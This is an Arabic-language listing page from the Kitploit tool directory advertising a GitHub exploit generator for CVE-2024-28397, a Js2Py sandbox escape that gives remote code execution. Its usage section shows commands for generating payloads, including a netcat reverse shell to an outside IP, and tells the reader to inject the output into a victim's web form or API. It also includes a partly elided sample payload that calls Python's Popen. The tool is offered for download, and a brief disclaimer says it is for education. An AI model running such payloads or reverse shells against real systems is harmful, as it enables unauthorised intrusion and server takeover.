Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — استغلال احترافي لـ CVE-2024-28397: هروب من صندوق حماية Js2Py يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE). يتضمن توليد حمولة نمطية. | Kitploit
أدوات/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

استغلال احترافي لـ CVE-2024-28397: هروب من صندوق حماية Js2Py يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE). يتضمن توليد حمولة نمطية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودعالموقع الإلكتروني
212منذ 7 أشهرلم تتم المراجعة بعد
مشاركة

معاينة فنية

💡 غوص عميق: انقر هنا لقراءة الإحاطة الفنية الكاملة (PDF).

CVE-2024-28397: مولد حمولة الهروب من حماية Js2Py

Python License CVE

مولد حمولة احترافي لـ CVE-2024-28397. تقوم هذه الأداة بإنشاء كود JavaScript خبيث مصمم للهروب من حماية js2py (الإصدارات <= 0.74) وتنفيذ أوامر عشوائية على النظام المستهدف.

🚨 تفاصيل الثغرة

  • معرف CVE: CVE-2024-28397
  • المكون المتأثر: Js2Py <= 0.74
  • التأثير: تنفيذ أكواد عن بُعد (RCE) / الهروب من الحماية
  • الآلية: استغلال Object.getOwnPropertyNames للوصول إلى صنف subprocess.Popen الخاص بـ Python من داخل بيئة JavaScript.
  • 🚀 الاستخدام

    يقوم هذا السكريبت بتوليد حمولة JavaScript الدقيقة اللازمة لاستغلال الثغرة. لا تحتاج إلى تثبيت js2py لاستخدام هذه الأداة.

    1. توليد حمولة

    قم بتشغيل السكريبت مع الأمر الذي تريد تنفيذه على جهاز الضحية.

    root@kitploit:~
    # توليد حمولة لتنفيذ 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # توليد حمولة لـ Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. مهاجمة الهدف

    انسخ الإخراج الذي يولده السكريبت وحقنه في التطبيق الثغري (مثل: نموذج ويب، نقطة نهاية API، أو ملف إعداد يتم تحليله بواسطة js2py).

    مثال على الحقن: إذا كان موقع ويب يأخذ إدخال المستخدم ويشغله باستخدام js2py.eval_js(user_input)، فسيؤدي لصق الكود المُولّد إلى تنفيذ أمرك على الخادم.

    📝 مثال

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (الكود الخبيث الكامل) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 المؤلف

    Ali Sünbül (xeloxa)

    • 📧 البريد الإلكتروني: [email protected]
    • 🌐 الموقع: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ إخلاء المسؤولية

    تم تقديم هذا البرنامج لأغراض تعليمية وبحوث أمنية فقط. المؤلف لا يتحمل أي مسؤولية عن أي سوء استخدام لهذا الكود. تأكد من الحصول على إذن صريح قبل اختبار هذا على أي نظام لا تملكه.

    تنزيل الأداة